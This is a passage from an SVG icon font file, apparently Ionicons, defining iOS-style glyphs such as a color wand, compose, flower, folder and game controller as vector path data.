    <glyph glyph-name="ion-ios-color-wand-outline" unicode="&#xf415;" horiz-adv-x="384" 
d="M128 298l256 -256l-34 -34l-256 256zM149 232l201 -201l11 11l-201 202zM120 344v40h16v-40h-16zM120 140v40h16v-40h-16zM216 256v16h40v-16h-40zM0 256v16h40v-16h-40zM47 354l29 -29l-12 -11l-28 28zM76 198l-29 -28l-11 11l28 28zM220 342l-28 -28l-12 11l29 29z" />
    <glyph glyph-name="ion-ios-color-wand" unicode="&#xf416;" horiz-adv-x="396" 
d="M140 289l256 -257l-34 -34l-256 257zM124 322v64h32v-64h-32zM124 118v64h32v-64h-32zM216 238v32h64v-32h-64zM246 336l-45 -45l-23 22l45 46zM34 336l23 23l45 -46l-23 -22zM34 169l45 45l23 -22l-45 -46zM0 238v32h64v-32h-64z" />
    <glyph glyph-name="ion-ios-compose-outline" unicode="&#xf417;" horiz-adv-x="384" 
d="M304 32v208l16 16v-240h-320v304h256l-16 -16h-224v-272h288zM174 164l171 171l11 -11l-180 -180h-32v32l180 180l11 -11l-171 -171zM380 368c2 -3 4 -6 4 -10s-2 -7 -4 -10l-12 -12l-21 21l-11 11v0l12 12c3 2 6 4 10 4s7 -2 10 -4z" />
    <glyph glyph-name="ion-ios-compose" unicode="&#xf418;" horiz-adv-x="384" 
d="M192 128l128 128v-240h-320v304h256l-128 -128v-64h64zM324 356l32 -32l-180 -180h-32v32zM380 368c2 -3 4 -6 4 -10s-2 -7 -4 -10l-12 -12l-21 21l-11 11v0l12 12c3 2 6 4 10 4s7 -2 10 -4z" />
    <glyph glyph-name="ion-ios-contact-outline" unicode="&#xf419;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM208 383c-105 0 -191 -86 -191 -191c0 -47 17 -89 45 -122c18 8 62 24 90 32c2 1 3 0 3 10c0 11 -1 18 -4 24c-4 8 -7 20 -9 31c-4 5 -10 15 -14 33c-3 16 -1 22 1 28v2
c1 4 0 23 -3 38c-2 10 1 34 15 52c9 12 27 26 58 28h18c32 -2 49 -16 58 -28c14 -18 17 -42 15 -52c-3 -15 -4 -34 -3 -38c0 0 1 -1 1 -2c2 -6 3 -12 0 -28c-4 -18 -10 -27 -14 -32c-2 -11 -5 -24 -9 -32c-3 -7 -6 -15 -6 -23c0 -10 0 -10 2 -11c27 -8 73 -24 93 -32
c28 33 45 76 45 122c0 105 -86 191 -191 191z" />
    <glyph glyph-name="ion-ios-contact" unicode="&#xf41a;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM208 1c59 0 111 27 146 69c-20 8 -66 24 -93 32c-2 1 -3 1 -3 11c0 8 4 16 7 23c4 8 7 21 9 32c4 5 10 14 14 32c3 16 2 22 0 28c0 0 -1 1 -1 2c-1 4 0 23 3 38c2 10 -1 34 -15 52
c-9 12 -26 26 -58 28h-18c-31 -2 -49 -16 -58 -28c-14 -18 -17 -42 -15 -52c3 -15 4 -34 3 -38v-2c-2 -6 -4 -12 -1 -28c4 -18 10 -28 14 -33c2 -11 5 -23 9 -31c3 -6 4 -13 4 -24c0 -10 -1 -9 -3 -10c-28 -8 -72 -24 -90 -32c35 -42 87 -69 146 -69z" />
    <glyph glyph-name="ion-ios-copy-outline" unicode="&#xf41b;" horiz-adv-x="288" 
d="M192 352v-64h64v-16h-80v80h16zM213 384l75 -75v-261h-48v-48h-240v336h48v48h165zM224 16v32h-176v272h-32v-304h208zM272 64v238l-65 66h-143v-304h208z" />
    <glyph glyph-name="ion-ios-copy" unicode="&#xf41c;" horiz-adv-x="288" 
d="M32 32h16h192v-32h-240v336h32v-288v-16zM213 384l75 -75v-261h-48h-192v288v48h165zM256 272v16h-64v64h-16v-80h80z" />
    <glyph glyph-name="ion-ios-crop-strong" unicode="&#xf41d;" horiz-adv-x="384" 
d="M64 336v48h32v-48h-32zM96 96h176v-32h-208v208h32v-176zM336 64v32h48v-32h-48zM0 320h320v-320h-32v288h-288v32z" />
    <glyph glyph-name="ion-ios-crop" unicode="&#xf41e;" horiz-adv-x="384" 
d="M64 336v48h16v-48h-16zM80 80h208v-16h-224v224h16v-208zM336 64v16h48v-16h-48zM0 320h320v-320h-16v304h-304v16z" />
    <glyph glyph-name="ion-ios-download-outline" unicode="&#xf41f;" horiz-adv-x="320" 
d="M192 304h128v-304h-320v304h128v-16h-112v-272h288v272h-112v16zM97 196l55 -55v243h16v-243l55 55l11 -12l-74 -74l-74 74z" />
    <glyph glyph-name="ion-ios-download" unicode="&#xf420;" horiz-adv-x="320" 
d="M168 304h152v-304h-320v304h152v-163l-55 55l-11 -12l74 -74l74 74l-11 12l-55 -55v163zM152 304v80h16v-80h-16z" />
    <glyph glyph-name="ion-ios-drag" unicode="&#xf421;" horiz-adv-x="352" 
d="M0 128v16h352v-16h-352zM0 184v16h352v-16h-352zM0 240v16h352v-16h-352z" />
    <glyph glyph-name="ion-ios-email-outline" unicode="&#xf422;" horiz-adv-x="384" 
d="M0 320h384v-256h-384v256zM192 180l163 124h-326zM16 80h352v214l-115 -88l68 -77l-2 -2l-79 70l-48 -37l-48 37l-79 -70l-2 2l68 77l-115 88v-214z" />
    <glyph glyph-name="ion-ios-email" unicode="&#xf423;" horiz-adv-x="384" 
d="M384 64h-384v242l131 -100l-68 -77l2 -2l79 70l48 -37l48 37l79 -70l2 2l-68 77l131 100v-242zM376 320l-184 -140l-184 140h368z" />
    <glyph glyph-name="ion-ios-eye-outline" unicode="&#xf424;" horiz-adv-x="384" 
d="M383 192l1 -1l-6 -6c-21 -21 -47 -48 -78 -69c-36 -24 -72 -36 -108 -36c-83 0 -130 49 -185 105l-7 7l1 1c39 40 67 64 94 81c32 20 63 30 97 30c83 0 146 -60 191 -112zM192 288c-62 0 -111 -36 -170 -96c24 -24 48 -50 76 -68c30 -20 60 -28 94 -28
c75 0 133 56 171 95c-26 29 -50 50 -74 66c-32 21 -64 31 -97 31zM192 112c-44 0 -80 36 -80 80s36 80 80 80s80 -36 80 -80s-36 -80 -80 -80zM192 256c-35 0 -64 -29 -64 -64s29 -64 64 -64s64 29 64 64s-29 64 -64 64zM224 192h16v0c0 -26 -22 -48 -48 -48s-48 21 -48 48
s22 48 48 48v-16c-16 0 -32 -13 -32 -31s15 -33 32 -33s32 14 32 32v0z" />
    <glyph glyph-name="ion-ios-eye" unicode="&#xf425;" horiz-adv-x="384" 
d="M383 192l1 -1l-6 -6c-21 -21 -47 -48 -78 -69c-36 -24 -72 -36 -108 -36c-83 0 -130 49 -185 105l-7 7l1 1c39 40 67 64 94 81c32 20 63 30 97 30c83 0 146 -60 191 -112zM192 112c44 0 80 36 80 80s-36 80 -80 80s-80 -36 -80 -80s36 -80 80 -80zM186 221
c0 -19 16 -35 35 -35c7 0 14 2 19 6v0c0 -27 -22 -48 -48 -48s-48 21 -48 48s22 48 48 48c-4 -5 -6 -12 -6 -19z" />
    <glyph glyph-name="ion-ios-fastforward-outline" unicode="&#xf426;" 
d="M16 293v-202l184 101zM240 292v0v-78v-27v-95l176 100zM224 320v0l224 -128l-224 -128v123l-224 -123v256l224 -123v123z" />
    <glyph glyph-name="ion-ios-fastforward" unicode="&#xf427;" 
d="M224 320v0l224 -128l-224 -128v123l-224 -123v256l224 -123v123z" />
    <glyph glyph-name="ion-ios-filing-outline" unicode="&#xf428;" horiz-adv-x="352" 
d="M288 320l64 -96v-160h-176h-176v160l64 96h224zM333 224l-45 68v-68h45zM80 304v-80h48c0 -26 22 -48 48 -48s48 22 48 48h48v80h-192zM64 292l-45 -68h45v68zM336 80v128h-98c-7 -28 -32 -48 -62 -48s-55 20 -62 48h-98v-128h160h160z" />
    <glyph glyph-name="ion-ios-filing" unicode="&#xf429;" horiz-adv-x="352" 
d="M176 160c30 0 55 20 62 48h114v-144h-176h-176v144h114c7 -28 32 -48 62 -48zM64 224h-7h-57l64 96v0v-80h16v80h192v-80h16v80v0l64 -96h-56h-8h-16h-8h-40c0 -26 -22 -48 -48 -48s-48 22 -48 48h-39h-9h-16z" />
    <glyph glyph-name="ion-ios-film-outline" unicode="&#xf42a;" horiz-adv-x="400" 
d="M0 360h400v-336h-400v336zM72 40v48h-56v-48h56zM72 104v48h-56v-48h56zM72 168v48h-56v-48h56zM72 232v48h-56v-48h56zM72 296v48h-56v-48h56zM312 40v144h-224v-144h224zM312 200v144h-224v-144h224zM384 40v48h-56v-48h56zM384 104v48h-56v-48h56zM384 168v48h-56v-48
h56zM384 232v48h-56v-48h56zM384 296v48h-56v-48h56z" />
    <glyph glyph-name="ion-ios-film" unicode="&#xf42b;" horiz-adv-x="400" 
d="M0 360h400v-336h-400v336zM72 40v48h-56v-48h56zM72 104v48h-56v-48h56zM72 168v48h-56v-48h56zM72 232v48h-56v-48h56zM72 296v48h-56v-48h56zM312 184v16h-224v-16h224zM384 40v48h-56v-48h56zM384 104v48h-56v-48h56zM384 168v48h-56v-48h56zM384 232v48h-56v-48h56z
M384 296v48h-56v-48h56z" />
    <glyph glyph-name="ion-ios-flag-outline" unicode="&#xf42c;" horiz-adv-x="256" 
d="M240 336c6 1 11 1 16 2v-16v-157c-5 -1 -10 -1 -16 -2c-11 -1 -24 -3 -39 -3c-25 0 -47 4 -69 9s-42 13 -64 13c-30 0 -46 -5 -52 -7v-143h-16v142v162v2l3 3c2 1 18 11 65 11c24 0 45 -4 67 -9c21 -4 42 -11 65 -11c15 0 29 3 40 4zM240 179v0v141c-11 -1 -25 -4 -40 -4
c-25 0 -46 6 -68 11s-42 9 -64 9c-30 0 -46 -5 -52 -7v-137c10 3 26 6 52 6c24 0 45 -8 67 -13c21 -4 43 -9 66 -9c15 0 28 2 39 3z" />
    <glyph glyph-name="ion-ios-flag" unicode="&#xf42d;" horiz-adv-x="256" 
d="M240 336c6 1 11 1 16 2v-16v-157c-5 -1 -10 -1 -16 -2c-11 -1 -24 -3 -39 -3c-25 0 -47 4 -69 9s-42 13 -64 13c-30 0 -46 -5 -52 -7v-143h-16v142v162v2l3 3c2 1 18 11 65 11c24 0 45 -4 67 -9c21 -4 42 -11 65 -11c15 0 29 3 40 4z" />
    <glyph glyph-name="ion-ios-flame-outline" unicode="&#xf42e;" horiz-adv-x="256" 
d="M96 416c87 -64 170 -179 159 -288c-13 -134 -104 -160 -127 -160s-127 40 -128 160c-1 146 122 143 96 288zM128 -24c0 0 40 36 40 80s-40 80 -40 80s-41 -36 -41 -80s41 -80 41 -80zM239 130c5 47 -10 99 -41 151c-22 36 -50 70 -83 99c0 -57 -24 -91 -49 -123
c-26 -34 -50 -65 -50 -129c0 -25 5 -48 15 -68c8 -17 20 -32 35 -45c8 -7 16 -12 23 -16c-9 16 -18 35 -18 57c0 51 44 90 46 92l11 9l11 -9c2 -2 45 -41 45 -92c0 -23 -9 -44 -19 -60c7 4 13 8 20 14c14 12 25 27 34 44c11 21 17 47 20 76z" />
    <glyph glyph-name="ion-ios-flame" unicode="&#xf42f;" horiz-adv-x="256" 
d="M96 416c87 -64 170 -179 159 -288c-13 -134 -104 -160 -127 -160s-127 40 -128 160c-1 146 122 143 96 288zM128 -24c0 0 40 36 40 80s-40 80 -40 80s-41 -36 -41 -80s41 -80 41 -80z" />
    <glyph glyph-name="ion-ios-flask-outline" unicode="&#xf430;" horiz-adv-x="384" 
d="M373 78c8 -16 11 -32 11 -46c-1 -36 -27 -64 -63 -64h-256c-36 0 -64 27 -65 64c0 14 4 30 12 46l116 195v127h-16v16h16h16v-16v-16h48v-16h-48v-32h32v-16h-32v-32h48v-16h-48v-3l-2 -4l-15 -25h49v-16h-58l-92 -154c-13 -25 -14 -43 -2 -63c9 -14 23 -23 41 -23h256
c17 0 33 8 41 22c5 8 6 17 6 26c0 12 -2 25 -9 38l-116 195l-3 4v131v16h16h16v-16h-16v-127zM44 73l72 119h153l72 -119c7 -11 10 -24 10 -33c-1 -24 -16 -40 -46 -40h-226c-30 0 -46 12 -46 40c0 9 4 22 11 33zM260 176h-135l-67 -111v0v0c-5 -8 -9 -19 -9 -25
c0 -13 5 -17 6 -18c4 -4 13 -6 24 -6h226c10 0 18 3 23 7c4 4 7 10 7 18c0 6 -3 16 -8 24v0v0z" />
    <glyph glyph-name="ion-ios-flask" unicode="&#xf431;" horiz-adv-x="384" 
d="M327 65v0c5 -8 8 -18 8 -24c0 -8 -3 -14 -7 -18c-5 -4 -13 -7 -23 -7h-226c-11 0 -20 2 -24 6c-1 1 -6 5 -6 18c0 6 4 17 9 25v0v0l67 111h135l67 -111v0zM373 78c8 -16 11 -32 11 -46c-1 -36 -27 -64 -63 -64h-256c-36 0 -64 27 -65 64c0 14 4 30 12 46l116 195v127h-16
v16h160v-16h-16v-127zM144 384v-16h48v16h-48zM144 336v-16h32v16h-32zM144 288v-16h48v16h-48zM127 240l-9 -16h58v16h-49zM351 40c0 9 -3 22 -10 33l-72 119h-154l-71 -119c-7 -11 -11 -24 -11 -33c0 -28 16 -40 46 -40h226c30 0 45 16 46 40z" />
    <glyph glyph-name="ion-ios-flower-outline" unicode="&#xf432;" 
d="M363 164c-29 0 -65 7 -93 14c-1 -3 -2 -6 -4 -9c25 -15 56 -36 76 -56c40 -40 53 -68 41 -80c-3 -3 -7 -4 -12 -4c-15 0 -38 15 -68 45c-20 20 -41 51 -56 76c-3 -2 -7 -3 -10 -4c7 -28 15 -64 15 -93c0 -56 -12 -85 -28 -85s-28 29 -28 85c0 29 8 65 15 93
c-3 1 -7 2 -10 4c-15 -25 -36 -56 -56 -76c-30 -30 -53 -45 -68 -45c-5 0 -9 1 -12 4c-12 12 1 40 41 80c20 20 51 41 76 56c-2 3 -3 6 -4 9c-28 -7 -64 -14 -93 -14c-56 0 -85 12 -85 28s29 28 85 28c29 0 65 -8 93 -15c1 3 2 7 4 10c-25 15 -56 35 -76 55
c-40 40 -53 68 -41 80c3 3 7 4 12 4c15 0 38 -14 68 -44c20 -20 41 -51 56 -76c3 2 7 3 10 4c-7 28 -15 64 -15 93c0 56 12 85 28 85s28 -29 28 -85c0 -29 -8 -65 -15 -93c3 -1 7 -2 10 -4c15 25 36 56 56 76c30 30 53 44 68 44c5 0 9 -1 12 -4c12 -12 -1 -40 -41 -80
c-20 -20 -51 -40 -76 -55c2 -3 3 -7 4 -10c28 7 64 15 93 15c56 0 85 -12 85 -28s-29 -28 -85 -28zM288 193v-3c30 -7 56 -10 75 -10c21 0 39 2 52 5c10 3 14 6 16 7c-2 1 -6 4 -16 7c-13 3 -31 5 -52 5c-19 0 -45 -4 -75 -11zM314 299c-14 -14 -30 -35 -46 -61l2 -2
c26 16 47 32 61 46c15 15 26 28 33 40c5 9 7 14 7 16c-4 0 -22 -4 -57 -39zM178 236l2 2c-16 26 -32 47 -46 61c-35 35 -53 39 -57 39c0 -2 2 -7 7 -16c7 -12 18 -25 33 -40c14 -14 35 -30 61 -46zM85 180c19 0 45 3 75 10v3c-30 7 -56 11 -75 11c-21 0 -39 -2 -52 -5
c-10 -3 -14 -6 -16 -7c2 -1 5 -4 15 -7c13 -3 32 -5 53 -5zM134 85c14 14 30 35 46 61l-2 2c-26 -16 -47 -32 -61 -46c-15 -15 -26 -29 -33 -41c-5 -9 -7 -14 -7 -16c4 0 22 5 57 40zM270 148l-2 -2c16 -26 32 -47 46 -61c35 -35 53 -40 57 -40c0 2 -2 7 -7 16
c-7 12 -18 26 -33 41c-14 14 -35 30 -61 46zM217 383c-3 -13 -5 -31 -5 -52c0 -19 4 -45 11 -75h2c7 30 11 56 11 75c0 21 -2 39 -5 52c-3 10 -6 14 -7 16c-1 -2 -4 -6 -7 -16zM231 0c3 13 5 32 5 53c0 19 -4 45 -11 75h-2c-7 -30 -11 -56 -11 -75c0 -21 2 -40 5 -53
c3 -10 6 -13 7 -15c1 2 4 5 7 15zM224 160c18 0 32 14 32 32s-14 32 -32 32s-32 -14 -32 -32s14 -32 32 -32zM313 42c10 -34 7 -53 -5 -58c-2 -1 -3 -1 -5 -1c-11 0 -25 13 -37 35c5 35 -2 76 -2 76s24 -34 49 -52zM302 -1c1 4 2 14 -3 34c-5 4 -10 9 -15 14
c0 -9 0 -17 -1 -25c10 -16 16 -22 19 -23zM182 365c-6 -35 1 -75 1 -75s-27 35 -48 51c-10 35 -7 54 5 59c2 1 3 1 5 1c11 0 24 -12 37 -36zM164 337c0 9 0 17 1 25c-10 16 -16 21 -19 22c-1 -4 -2 -14 3 -34c5 -4 10 -8 15 -13zM50 149c35 -4 76 2 76 2s-34 -24 -51 -48
c-12 -4 -26 -6 -35 -6c-13 0 -21 4 -24 11c-5 11 7 25 34 41zM66 117c4 5 8 10 13 15c-9 0 -17 0 -25 1c-16 -10 -21 -16 -22 -19c1 0 4 -1 8 -1c7 0 16 1 26 4zM432 276c5 -11 -7 -26 -34 -42c-35 5 -76 -2 -76 -2s33 25 51 49c13 4 26 5 35 5c13 0 21 -3 24 -10zM394 250
c16 10 21 16 22 19c-1 0 -4 1 -8 1c-7 0 -16 -1 -26 -4c-4 -5 -8 -9 -13 -14c9 0 17 -1 25 -2zM131 39c31 24 53 55 53 55s-7 -39 -3 -71c-15 -26 -28 -39 -39 -39c-2 0 -4 0 -6 1c-11 5 -13 24 -5 54zM143 1c4 2 12 8 22 26c0 6 -1 13 -1 20c-6 -6 -13 -12 -19 -17
c-4 -18 -3 -26 -2 -29zM312 398c11 -5 13 -22 5 -54c-29 -21 -53 -55 -53 -55s8 48 3 71c13 25 28 39 39 39c2 0 4 0 6 -1zM303 353c5 18 3 27 2 30c-4 -2 -12 -8 -22 -26c0 -6 1 -14 1 -21c6 6 13 12 19 17zM71 285c18 -24 55 -53 55 -53s-40 7 -70 3c-28 15 -43 32 -38 44
c3 7 10 11 22 11c8 0 21 -1 31 -5zM33 273c2 -4 8 -12 26 -22c6 0 13 1 20 1c-6 6 -12 12 -17 18c-8 2 -16 4 -22 4c-4 0 -6 -1 -7 -1zM392 149c30 -17 43 -33 38 -45c-3 -7 -10 -10 -22 -10c-8 0 -19 1 -31 5c-20 27 -55 52 -55 52s45 -8 70 -2zM408 110c4 0 6 1 7 1
c-2 4 -8 12 -26 22c-6 0 -13 -1 -20 -1c6 -6 12 -13 17 -19c8 -2 16 -3 22 -3z" />
    <glyph glyph-name="ion-ios-flower" unicode="&#xf433;" 
d="M363 220c56 0 85 -12 85 -28s-29 -28 -85 -28c-29 0 -65 7 -93 14c-1 -3 -2 -6 -4 -9c25 -15 56 -36 76 -56c40 -40 53 -68 41 -80s-40 1 -80 41c-20 20 -41 51 -56 76c-3 -2 -7 -3 -10 -4c7 -28 15 -64 15 -93c0 -56 -12 -85 -28 -85s-28 29 -28 85c0 29 8 65 15 93
c-3 1 -7 2 -10 4c-15 -25 -36 -56 -56 -76c-40 -40 -68 -53 -80 -41s1 40 41 80c20 20 51 41 76 56c-2 3 -3 6 -4 9c-28 -7 -64 -14 -93 -14c-56 0 -85 12 -85 28s29 28 85 28c29 0 65 -8 93 -15c1 3 2 7 4 10c-25 15 -56 35 -76 55c-40 40 -53 68 -41 80s40 0 80 -40
c20 -20 41 -51 56 -76c3 2 6 3 9 4c-7 28 -14 64 -14 93c0 56 12 85 28 85s28 -29 28 -85c0 -29 -7 -65 -14 -93c3 -1 6 -2 9 -4c15 25 36 56 56 76c40 40 68 52 80 40s-1 -40 -41 -80c-20 -20 -51 -40 -76 -55c2 -3 3 -7 4 -10c28 7 64 15 93 15zM264 94c0 0 24 -34 49 -52
c10 -34 7 -53 -5 -58c-2 -1 -3 -1 -5 -1c-11 0 -25 13 -37 35c5 35 -2 76 -2 76zM183 290c0 0 -27 35 -48 51c-10 35 -7 54 5 59c2 1 3 1 5 1c11 0 24 -12 37 -36c-6 -35 1 -75 1 -75zM126 151c0 0 -34 -24 -51 -48c-12 -4 -26 -6 -35 -6c-13 0 -21 4 -24 11
c-5 11 7 25 34 41c35 -4 76 2 76 2zM322 232c0 0 33 25 51 49c13 4 26 5 35 5c13 0 21 -3 24 -10c5 -11 -7 -26 -34 -42c-35 5 -76 -2 -76 -2zM131 39c31 24 53 55 53 55s-7 -39 -3 -71c-15 -26 -28 -39 -39 -39c-2 0 -4 0 -6 1c-11 5 -13 24 -5 54zM317 344
c-29 -21 -53 -55 -53 -55s8 48 3 71c13 25 28 39 39 39c2 0 4 0 6 -1c11 -5 13 -22 5 -54zM56 235c-28 15 -43 32 -38 44c3 7 10 11 22 11c8 0 21 -1 31 -5c18 -24 55 -53 55 -53s-40 7 -70 3zM392 149c30 -17 43 -33 38 -45c-3 -7 -10 -10 -22 -10c-8 0 -19 1 -31 5
c-20 27 -55 52 -55 52s45 -8 70 -2z" />
    <glyph glyph-name="ion-ios-folder-outline" unicode="&#xf434;" 
d="M425 352c13 0 23 -10 23 -23v-304c0 -14 -10 -25 -23 -25h-400c-13 0 -25 12 -25 25v336c0 13 11 23 25 23h112c8 0 12 -2 17 -7v0l23 -23c2 -2 3 -2 6 -2h242zM25 368c-4 0 -9 -3 -9 -7v-74c3 1 5 1 8 1h400c3 0 5 0 8 -1v42c0 4 -3 7 -7 7h-242c-7 0 -12 2 -17 7
l-23 23c-2 2 -3 2 -6 2h-112zM432 25v239c0 4 -4 8 -8 8h-400c-4 0 -8 -4 -8 -8v-239c0 -4 5 -9 9 -9h400c4 0 7 5 7 9z" />
    <glyph glyph-name="ion-ios-folder" unicode="&#xf435;" 
d="M440 272c4 0 8 -4 8 -8v-239c0 -14 -10 -25 -23 -25h-400c-13 0 -25 12 -25 25v239c0 4 4 8 8 8h432zM425 352c13 0 23 -10 23 -23v-42c-3 1 -5 1 -8 1h-432c-3 0 -5 0 -8 -1v74c0 13 11 23 25 23h112c8 0 12 -2 17 -7v0l23 -23c2 -2 3 -2 6 -2h242z" />
    <glyph glyph-name="ion-ios-football-outline" unicode="&#xf436;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM249 6c3 1 5 1 8 2l24 64l-20 39v1h-106l-20 -39l25 -65c2 -1 5 -1 7 -2c12 -3 25 -5 38 -5c14 0 30 2 44 5zM41 284c-15 -27 -23 -57 -24 -89l43 37v0zM142 371
c-36 -14 -68 -38 -90 -69l22 -64l5 -2l49 -23l71 60v58zM277 201l-70 58l-69 -58v-1l18 -72h104l18 72zM399 195c-1 32 -9 63 -24 90l-19 -53v0zM364 302c-22 31 -54 56 -90 69l-58 -40v-58l71 -60l54 24zM18 175c3 -34 15 -66 33 -92l70 -1l21 39l-20 77l-1 1l-49 22z
M295 82l70 1c18 26 30 58 33 92l-54 46l-50 -23l-20 -77zM207 345l47 32c-15 4 -30 6 -46 6s-32 -2 -47 -6zM118 66l-54 1c20 -23 46 -42 75 -53l-20 50zM277 14c29 11 55 30 75 53l-56 -1l-2 -3z" />
    <glyph glyph-name="ion-ios-football" unicode="&#xf437;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM249 6c3 1 5 1 8 2l24 64l-20 39v1h-106l-20 -39l25 -65c2 -1 5 -1 7 -2c12 -3 25 -5 38 -5c14 0 30 2 44 5zM142 371c-36 -14 -68 -38 -90 -69l22 -64l5 -2l49 -23l71 60v58z
M364 302c-22 31 -54 56 -90 69l-58 -40v-58l71 -60l54 24zM18 175c3 -34 15 -66 33 -92l70 -1l21 39l-20 77l-1 1l-49 22zM295 82l70 1c18 26 30 58 33 92l-54 46l-50 -23l-20 -77z" />
    <glyph glyph-name="ion-ios-game-controller-a-outline" unicode="&#xf438;" 
d="M163 208c3 0 5 -2 5 -5v-22c0 -3 -2 -5 -5 -5h-35v-35c0 -3 -3 -5 -6 -5h-21c-3 0 -5 2 -5 5v35h-35c-3 0 -5 3 -5 6v21c0 3 2 5 5 5h35v35c0 3 2 5 5 5h22c3 0 5 -2 5 -5v-35h35zM330 169c11 0 20 -8 20 -19s-9 -19 -20 -19s-19 8 -19 19s8 19 19 19zM288 211
c11 0 19 -8 19 -19s-8 -19 -19 -19s-20 8 -20 19s9 19 20 19zM373 211c11 0 19 -8 19 -19s-8 -19 -19 -19s-20 8 -20 19s9 19 20 19zM330 253c11 0 20 -8 20 -19s-9 -20 -20 -20s-19 9 -19 20s8 19 19 19zM337 286h-226c-26 0 -49 -9 -67 -26s-28 -41 -28 -67s10 -51 28 -68
s41 -27 67 -27h226c26 0 49 10 67 27s28 42 28 68s-10 50 -28 67s-41 26 -67 26zM337 302v0c61 0 111 -45 111 -109s-50 -111 -111 -111h-226c-61 0 -111 47 -111 111s50 109 111 109h226z" />
    <glyph glyph-name="ion-ios-game-controller-a" unicode="&#xf439;" 
d="M337 302c61 0 111 -45 111 -109s-50 -111 -111 -111h-226c-61 0 -111 47 -111 111s50 109 111 109h226zM168 181v0v22c0 3 -2 5 -5 5h-35v35c0 3 -2 5 -5 5h-22c-3 0 -5 -2 -5 -5v-35h-35c-3 0 -5 -2 -5 -5v-21c0 -3 2 -6 5 -6h35v-35c0 -3 2 -5 5 -5h21c3 0 6 2 6 5v35
h35c3 0 5 2 5 5zM288 173c11 0 19 8 19 19s-8 19 -19 19s-20 -8 -20 -19s9 -19 20 -19zM330 131c11 0 20 8 20 19s-9 19 -20 19s-19 -8 -19 -19s8 -19 19 -19zM330 214c11 0 20 9 20 20s-9 19 -20 19s-19 -8 -19 -19s8 -20 19 -20zM373 173c11 0 19 8 19 19s-8 19 -19 19
s-20 -8 -20 -19s9 -19 20 -19z" />
    <glyph glyph-name="ion-ios-game-controller-b-outline" unicode="&#xf43a;" 
d="M276 244c11 0 20 -9 20 -20s-9 -20 -20 -20s-20 9 -20 20s9 20 20 20zM320 200c11 0 20 -9 20 -20s-9 -20 -20 -20s-20 9 -20 20s9 20 20 20zM103 264c22 0 39 -18 39 -40s-17 -40 -39 -40s-39 18 -39 40s17 40 39 40zM103 205c11 0 19 8 19 19s-8 19 -19 19
s-19 -8 -19 -19s8 -19 19 -19zM320 288c11 0 20 -9 20 -20s-9 -20 -20 -20s-20 9 -20 20s9 20 20 20zM364 244c11 0 20 -9 20 -20s-9 -20 -20 -20s-20 9 -20 20s9 20 20 20zM434 199c21 -88 18 -152 -7 -164c-4 -2 -9 -3 -13 -3c-22 0 -45 24 -68 52c-26 32 -32 33 -110 33
h-24c-78 0 -84 -1 -110 -33c-23 -28 -46 -52 -68 -52c-4 0 -9 1 -13 3c-25 12 -28 76 -7 164s43 136 88 149c10 3 18 4 26 4c28 0 47 -15 96 -15s68 15 96 15c8 0 16 -1 26 -4c45 -13 67 -61 88 -149zM420 49c10 5 23 48 -1 146c-21 90 -43 128 -78 138c-8 2 -14 3 -21 3
c-10 0 -19 -2 -30 -5c-16 -4 -36 -10 -66 -10s-50 6 -66 10c-11 3 -20 5 -30 5c-7 0 -13 -1 -21 -3c-35 -10 -57 -48 -78 -138c-24 -98 -11 -141 -1 -146c2 -1 4 -1 6 -1c6 0 14 4 23 12s19 18 32 34s24 28 44 34c17 5 38 5 79 5h24c41 0 62 0 79 -5c20 -6 31 -18 44 -34
s23 -26 32 -34s17 -12 23 -12c2 0 4 0 6 1z" />
    <glyph glyph-name="ion-ios-game-controller-b" unicode="&#xf43b;" 
d="M103 243c11 0 19 -8 19 -19s-8 -19 -19 -19s-19 8 -19 19s8 19 19 19zM434 199c21 -88 18 -152 -7 -164c-4 -2 -9 -3 -13 -3c-22 0 -45 24 -68 52c-26 32 -32 33 -110 33h-24c-78 0 -84 -1 -110 -33c-23 -28 -46 -52 -68 -52c-4 0 -9 1 -13 3c-25 12 -28 76 -7 164
s43 136 88 149c10 3 18 4 26 4c28 0 47 -15 96 -15s68 15 96 15c8 0 16 -1 26 -4c45 -13 67 -61 88 -149zM103 184c22 0 39 18 39 40s-17 40 -39 40s-39 -18 -39 -40s17 -40 39 -40zM276 204c11 0 20 9 20 20s-9 20 -20 20s-20 -9 -20 -20s9 -20 20 -20zM320 160
c11 0 20 9 20 20s-9 20 -20 20s-20 -9 -20 -20s9 -20 20 -20zM320 248c11 0 20 9 20 20s-9 20 -20 20s-20 -9 -20 -20s9 -20 20 -20zM364 204c11 0 20 9 20 20s-9 20 -20 20s-20 -9 -20 -20s9 -20 20 -20z" />
    <glyph glyph-name="ion-ios-gear-outline" unicode="&#xf43c;" horiz-adv-x="384" 
d="M193 288c26 0 50 -10 68 -28s28 -42 28 -68s-10 -50 -28 -68s-42 -28 -68 -28s-50 10 -68 28s-28 42 -28 68s10 50 28 68s42 28 68 28zM193 112c44 0 80 36 80 80s-36 80 -80 80s-80 -36 -80 -80s36 -80 80 -80zM138 365c-10 -3 -20 -7 -30 -12c2 -8 1 -16 0 -24
c-2 -13 -8 -25 -18 -35c-12 -12 -29 -19 -46 -19c-4 0 -9 0 -13 1c-5 -10 -9 -20 -12 -30c7 -4 12 -10 17 -17c8 -11 12 -24 12 -37s-4 -26 -12 -37c-5 -7 -10 -13 -17 -17c3 -10 7 -20 12 -30c4 1 9 1 13 1c17 0 34 -7 46 -19c10 -10 16 -22 18 -35c1 -8 2 -16 0 -24
c10 -5 20 -9 30 -12c4 7 10 12 17 17c11 8 24 12 37 12s26 -4 37 -12c7 -5 13 -10 17 -17c10 3 20 7 30 12c-2 8 -1 16 0 24c2 13 8 25 18 35c12 12 29 19 46 19c4 0 9 0 13 -1c5 10 9 20 12 30c-7 4 -12 10 -17 17c-8 11 -12 24 -12 37s4 26 12 37c5 7 10 13 17 17
